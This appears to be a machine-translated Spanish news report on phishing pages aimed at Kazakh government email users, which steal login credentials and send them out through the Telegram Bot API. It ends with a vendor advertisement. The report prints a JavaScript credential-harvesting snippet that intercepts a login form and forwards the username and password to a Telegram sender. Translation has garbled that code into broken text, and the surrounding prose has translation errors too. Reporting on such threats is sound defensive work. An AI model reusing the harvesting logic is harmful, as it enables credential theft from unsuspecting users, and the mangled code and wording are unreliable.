Los investigadores de ciberseguridad han identificado una tendencia alarmante en la que los actores de amenaza están aprovechando cada vez más la infraestructura de API BOT de Telegram como un canal de comunicación encubierto para la exfiltración de datos.
Esta sofisticada metodología de ataque combina técnicas tradicionales de phishing con servicios de mensajería legítimos para evitar controles de seguridad convencionales y establecer operaciones persistentes de comando y control.
Las campañas maliciosas utilizan páginas de inicio de sesión falsas elaboradas para cosechar las credenciales de los usuarios antes de transmitir los datos robados directamente a los bots de telegrama controlados por los atacantes.
Página de inicio de sesión falsa (fuente – GitHub)
Investigaciones recientes han revelado que estos ataques se dirigen específicamente a organizaciones de alto valor y entidades gubernamentales, con actores de amenaza que desplegan mecanismos de recolección de credenciales basados en JavaScript integrados en páginas HTML aparentemente legítimas.
Los ataques demuestran un enfoque profesional para la ingeniería social, que incorpora interfaces de aspecto auténtico que reflejan los dominios del gobierno y los portales oficiales de servicios oficiales.
El diseño del malware sugiere campañas coordinadas dirigidas al robo sistemático de credenciales en lugar de ataques oportunistas.
Un entusiasta de la ciberesc, Cocomelonc anotado La aparición de esta variante de amenaza a través de un análisis exhaustivo de los archivos HTML maliciosos descubiertos en el sector público de Kazajstán.
La investigación identificó múltiples instancias en las que los atacantes elaboraron páginas de phishing específicas del dominio dirigidas a las cuentas de correo electrónico del gobierno, incorporando direcciones de correo electrónico previamente llenas para mejorar la credibilidad del ataque.
Estas campañas demuestran metodologías de orientación sofisticadas, lo que sugiere que los actores de amenaza poseen inteligencia previa de reconocimiento sobre sus víctimas previstas.
El impacto operativo se extiende más allá del simple robo de credenciales, ya que los compromisos exitosos proporcionan a los actores de amenaza vías de autenticación legítimas en sistemas organizacionales sensibles.
El análisis de inteligencia indica que estos ataques facilitan el movimiento lateral dentro de las redes comprometidas, lo que permite el acceso persistente y las actividades prolongadas de recopilación de datos.
Mecanismo de exfiltración basado en telegrama
La funcionalidad central del malware se centra en un sistema de intercepción de credenciales basado en JavaScript que captura la entrada del usuario antes de transmitir datos a través de la infraestructura de mensajes de Telegram.
El mecanismo de ataque opera a través de un formulario HTML estratégicamente elaborado que evita la sumisión de la forma estándar mientras captura las credenciales ingresadas:-
document.getElementById (‘loginform’).. addEventListener (‘enviar’, function (event) {event.preventDefault (); var userername = document.getElementById (‘username’). valor; var contraseña = document.getElementById (‘contraseña’). Value; Var de carga Pay = `Username: $ {Username} \ \ Norta Worthports: $}; SendTotelegram (carga útil);
El proceso de transmisión de datos utiliza la API BOT de Telegram a través de llamadas XMLHTTPREQUEST, estableciendo comunicación directa con canales controlados por atacantes.
La implementación incluye tokens BOT específicos e identificadores de chat, creando vías de exfiltración dedicadas para credenciales robadas.
El análisis de muestras recuperadas revela patrones de integración de API consistentes, lo que sugiere kits de herramientas estandarizados entre los actores de amenaza.
El malware incorpora mecanismos de manejo de errores y codificación de datos para garantizar una transmisión confiable mientras se mantiene la seguridad operativa a través del abuso legítimo del servicio.
Los investigadores de seguridad enfatizan el desafío que estos ataques presentes a los sistemas de detección tradicionales, ya que la comunicación ocurre a través de canales encriptados utilizando infraestructura legítima.
Las organizaciones deben implementar estrategias de monitoreo integrales que incluyan el análisis de comportamiento de JavaScript e inspección del tráfico de red para identificar estos sofisticados intentos de exfiltración.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
